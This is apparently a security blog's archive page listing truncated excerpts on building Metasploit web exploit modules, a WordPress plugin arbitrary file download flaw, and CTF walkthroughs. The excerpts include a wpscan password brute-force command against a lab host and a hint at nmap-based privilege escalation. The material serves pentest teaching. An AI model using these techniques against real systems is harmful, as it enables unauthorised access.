Automating web exploits using metasploit – 2
Categories
Injection, Web Attacks, webdev

In the previous article we covered the initialize method. So moving on to the juice stuff the check and exploit methods. Enter Check Method The check method is simple. we have already declared all we need to use so now lets put everything into good use. Similar to our previous python based exploit ; we […]

Automating web exploits using metasploit
Categories
Injection, Web Attacks, webdev

Today I want to go through something even I have been struggling with for a while ; creating PoC’s is a good thing but creating actionable exploits for frameworks like metasploit was really something else; takes a lot more discipline. Why would we do this? well interactive shells are everyone’s joy. PS: yes I had […]

Scripts & Sploits
Categories
Projects

This project is dedicated to a number of items; the main aim of the repository is to solve some challenges as I carry out pentests and populate PoC’s /exploits when none are available as of the time of testing. The main languages used so far are: Ruby Python Batch File Scripting The composition includes: Metasploit […]

[zero code] LFI and Arbitrary file download exploits on Mth3l3m3nt Framework
Categories
LFI, OWASP Mth3l3m3nt, pentest, Web Attacks

This simple post will take you through the process of adding an arbitrary file download exploit to mth3l3m3nt ; so yes no excuse to not have a working PoC for LFI or arbitrary file downloads because “I can’t code”. We will use the case of WordPress Plugin Membership Simplified v1.58 – Arbitrary File Download whose process of coming […]

WordPress Plugin Membership Simplified v1.58 – Arbitrary File Download
Categories
LFI, Uncategorized, Web Attacks, webdev

Today we will discuss poor development practices in wordpress plugins with key focus WordPress Plugin Membership Simplified v1.58 which as of the time of this writing the script is not patched . The vulnerable script is as below: Meta data: Discovery : Larry W Cashdollar  WPVDB ID : 8777 CVE-ID :  CVE-2017-1002008 Dork Standard stuff […]

John The Troll (CTF – Africahackon) – Key 3-Part-2
Categories
ctf, pentest, Uncategorized, Web Attacks

Following the previous article where all exploits failed , there are still 2 doors down : Nmap be abit old Go for some “GRUB“.  Nmap be abit old Now for this bit nmap is old its version 3.81. This can be abused via the –interactive option. More information on this can be found here. But basically […]

John The Troll (CTF – Africahackon) – Key 3
Categories
Crypto Stuff, ctf, OS, pentest, Uncategorized, Web Attacks

Now from John The Troll (CTF – Africahackon) – Key 2  we have gotten to be Chicken, so the next thing would be getting information about the system. [+] Kernel Linux version 3.13.0-55-generic (buildd@brownie) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 [+] fstab entries # /etc/fstab: static file system […]

John The Troll (CTF – Africahackon) – Key 2
Categories
Crypto Stuff, ctf, OS, pentest, Uncategorized, Web Attacks

After the previous article we got the first key. Now for the second key we needed to move a notch higher into the system. We had a loot.dic so the best option seeing we only have the web application facing us so far would be bruteforcing it. root@mth3l3m3nt:~# wpscan -u http://192.168.238.101/ -U hacker123 -w ~/loot.dic […]

April 2024
M T W T F S S
1234567
891011121314
15161718192021
22232425262728
2930